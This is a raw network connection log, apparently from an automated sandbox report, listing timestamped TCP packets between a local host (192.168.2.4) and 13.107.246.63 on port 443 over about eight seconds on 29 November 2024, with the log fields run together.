                                                                                                                                      Nov 29, 2024 23:11:32.337311983 CET49848443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:32.337316036 CET4434984813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:32.340092897 CET49852443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:32.340111017 CET4434985213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:32.340186119 CET49852443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:32.340359926 CET49852443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:32.340367079 CET4434985213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:32.436049938 CET4434984713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:32.436415911 CET49847443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:32.436434984 CET4434984713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:32.436830997 CET49847443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:32.436836004 CET4434984713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:32.880237103 CET4434984713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:32.880319118 CET4434984713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:32.880367994 CET49847443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:32.880539894 CET49847443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:32.880563974 CET4434984713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:32.880573034 CET49847443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:32.880578995 CET4434984713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:32.882929087 CET49853443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:32.882972002 CET4434985313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:32.883045912 CET49853443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:32.883188009 CET49853443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:32.883204937 CET4434985313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:33.568588018 CET4434984913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:33.569022894 CET49849443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:33.569045067 CET4434984913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:33.569442987 CET49849443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:33.569447994 CET4434984913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:33.741698980 CET4434985013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:33.742094040 CET49850443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:33.742116928 CET4434985013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:33.742479086 CET49850443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:33.742486000 CET4434985013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:33.840599060 CET4434985113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:33.840936899 CET49851443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:33.840966940 CET4434985113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:33.841319084 CET49851443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:33.841324091 CET4434985113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.015516996 CET4434984913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.015587091 CET4434984913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.015641928 CET49849443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.015809059 CET49849443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.015820980 CET4434984913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.015832901 CET49849443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.015836954 CET4434984913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.018276930 CET49854443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.018296957 CET4434985413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.018374920 CET49854443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.018516064 CET49854443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.018526077 CET4434985413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.121246099 CET4434985213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.121613026 CET49852443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.121623993 CET4434985213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.122064114 CET49852443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.122066975 CET4434985213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.185956955 CET4434985013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.186005116 CET4434985013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.186052084 CET49850443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.186216116 CET49850443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.186228991 CET4434985013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.186238050 CET49850443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.186243057 CET4434985013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.188760042 CET49855443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.188816071 CET4434985513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.188882113 CET49855443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.189001083 CET49855443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.189018965 CET4434985513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.294625044 CET4434985113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.294671059 CET4434985113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.294728994 CET49851443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.294872999 CET49851443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.294883966 CET4434985113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.294893980 CET49851443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.294898033 CET4434985113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.297278881 CET49856443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.297297955 CET4434985613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.297370911 CET49856443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.297514915 CET49856443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.297527075 CET4434985613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.565200090 CET4434985213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.565262079 CET4434985213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.565412045 CET49852443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.565654039 CET49852443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.565660954 CET4434985213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.565689087 CET49852443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.565692902 CET4434985213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.568221092 CET49857443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.568233967 CET4434985713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.568310022 CET49857443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.568455935 CET49857443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.568464994 CET4434985713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.730768919 CET4434985313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.731169939 CET49853443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.731194019 CET4434985313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:34.731600046 CET49853443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:34.731605053 CET4434985313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:35.186722994 CET4434985313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:35.186800957 CET4434985313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:35.186966896 CET49853443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:35.187180042 CET49853443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:35.187194109 CET4434985313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:35.187203884 CET49853443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:35.187208891 CET4434985313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:35.190361977 CET49858443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:35.190376043 CET4434985813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:35.190437078 CET49858443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:35.192270041 CET49858443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:35.192281008 CET4434985813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:35.814477921 CET4434985413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:35.814994097 CET49854443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:35.815010071 CET4434985413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:35.815443993 CET49854443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:35.815448999 CET4434985413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:35.903450012 CET4434985513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:35.903784990 CET49855443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:35.903804064 CET4434985513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:35.904141903 CET49855443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:35.904148102 CET4434985513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.076925993 CET4434985613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.077462912 CET49856443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.077483892 CET4434985613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.077846050 CET49856443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.077852011 CET4434985613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.259394884 CET4434985413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.259452105 CET4434985413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.259493113 CET49854443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.259668112 CET49854443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.259676933 CET4434985413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.259687901 CET49854443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.259694099 CET4434985413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.262209892 CET49859443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.262224913 CET4434985913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.262325048 CET49859443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.262433052 CET49859443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.262439966 CET4434985913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.338438034 CET4434985513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.338488102 CET4434985513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.338541985 CET49855443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.338690996 CET49855443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.338716030 CET4434985513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.338731050 CET49855443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.338737011 CET4434985513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.340851068 CET49860443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.340881109 CET4434986013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.340955019 CET49860443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.341088057 CET49860443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.341099977 CET4434986013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.351285934 CET4434985713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.351824045 CET49857443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.351835012 CET4434985713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.352252007 CET49857443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.352256060 CET4434985713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.538369894 CET4434985613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.538410902 CET4434985613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.538556099 CET49856443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.538698912 CET49856443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.538706064 CET4434985613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.538716078 CET49856443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.538718939 CET4434985613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.540628910 CET49861443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.540657043 CET4434986113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.540725946 CET49861443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.540831089 CET49861443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.540842056 CET4434986113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.898360968 CET4434985713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.898381948 CET4434985713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.898415089 CET4434985713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.898452997 CET49857443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.898479939 CET49857443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.898695946 CET49857443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.898701906 CET4434985713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.898711920 CET49857443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.898715973 CET4434985713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.901340008 CET49862443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.901365995 CET4434986213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.901459932 CET49862443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.901627064 CET49862443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.901638031 CET4434986213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.972784996 CET4434985813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.973277092 CET49858443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.973301888 CET4434985813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:36.973740101 CET49858443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:36.973743916 CET4434985813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:37.462948084 CET4434985813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:37.463027954 CET4434985813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:37.463082075 CET49858443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:37.463247061 CET49858443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:37.463255882 CET4434985813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:37.463263988 CET49858443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:37.463267088 CET4434985813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:37.465833902 CET49863443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:37.465857029 CET4434986313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:37.465938091 CET49863443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:37.466084957 CET49863443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:37.466098070 CET4434986313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:37.997481108 CET4434985913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:37.998070002 CET49859443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:37.998079062 CET4434985913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:37.998517036 CET49859443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:37.998521090 CET4434985913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.121586084 CET4434986013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.121957064 CET49860443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.121977091 CET4434986013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.122332096 CET49860443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.122335911 CET4434986013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.284394026 CET4434986113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.284732103 CET49861443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.284755945 CET4434986113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.285089016 CET49861443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.285094023 CET4434986113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.434643984 CET4434985913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.434698105 CET4434985913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.434737921 CET49859443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.434895992 CET49859443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.434902906 CET4434985913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.434912920 CET49859443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.434916973 CET4434985913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.437371969 CET49864443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.437412977 CET4434986413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.437486887 CET49864443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.437616110 CET49864443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.437629938 CET4434986413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.571444988 CET4434986013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.571485996 CET4434986013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.571558952 CET49860443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.571574926 CET4434986013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.571850061 CET49860443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.571866989 CET4434986013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.571928978 CET49860443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.571985006 CET4434986013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.572012901 CET4434986013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.572052002 CET49860443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.574002028 CET49865443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.574033022 CET4434986513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.574110985 CET49865443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.574238062 CET49865443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.574251890 CET4434986513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.724504948 CET4434986113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.724524975 CET4434986113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.724571943 CET49861443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.724586010 CET4434986113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.724625111 CET49861443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.725050926 CET49861443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.725055933 CET4434986113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.725069046 CET49861443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.725164890 CET4434986113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.725188971 CET4434986113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.725229025 CET49861443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.727612972 CET49866443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.727650881 CET4434986613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.727719069 CET49866443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.727843046 CET49866443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.727858067 CET4434986613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.813967943 CET4434986213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.814618111 CET49862443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.814634085 CET4434986213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:38.815118074 CET49862443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:38.815123081 CET4434986213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.191087008 CET4434986313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.191572905 CET49863443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:39.191595078 CET4434986313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.192028999 CET49863443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:39.192034960 CET4434986313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.271836042 CET4434986213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.271853924 CET4434986213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.271893978 CET4434986213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.271912098 CET49862443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:39.271948099 CET49862443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:39.272135019 CET49862443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:39.272147894 CET4434986213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.272156954 CET49862443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:39.272161007 CET4434986213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.274749994 CET49867443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:39.274772882 CET4434986713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.274846077 CET49867443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:39.275007963 CET49867443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:39.275017977 CET4434986713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.627015114 CET4434986313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.629980087 CET4434986313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.630043983 CET49863443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:39.630068064 CET49863443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:39.630079031 CET4434986313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.630089998 CET49863443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:39.630095005 CET4434986313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.632973909 CET49868443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:39.633014917 CET4434986813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:39.633084059 CET49868443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:39.633291960 CET49868443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:39.633306980 CET4434986813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:40.236737013 CET4434986413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:40.237524986 CET49864443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:40.237550020 CET4434986413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:40.238013029 CET49864443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:40.238024950 CET4434986413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:40.508049965 CET4434986613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:40.508497953 CET49866443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:40.508510113 CET4434986613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:40.508949041 CET49866443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:40.508955002 CET4434986613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:40.681742907 CET4434986413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:40.684976101 CET4434986413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:40.685039043 CET49864443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:40.685096025 CET49864443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:40.685112953 CET4434986413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:40.685122967 CET49864443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:40.685127974 CET4434986413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:40.687654972 CET49869443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:40.687679052 CET4434986913.107.246.63192.168.2.4
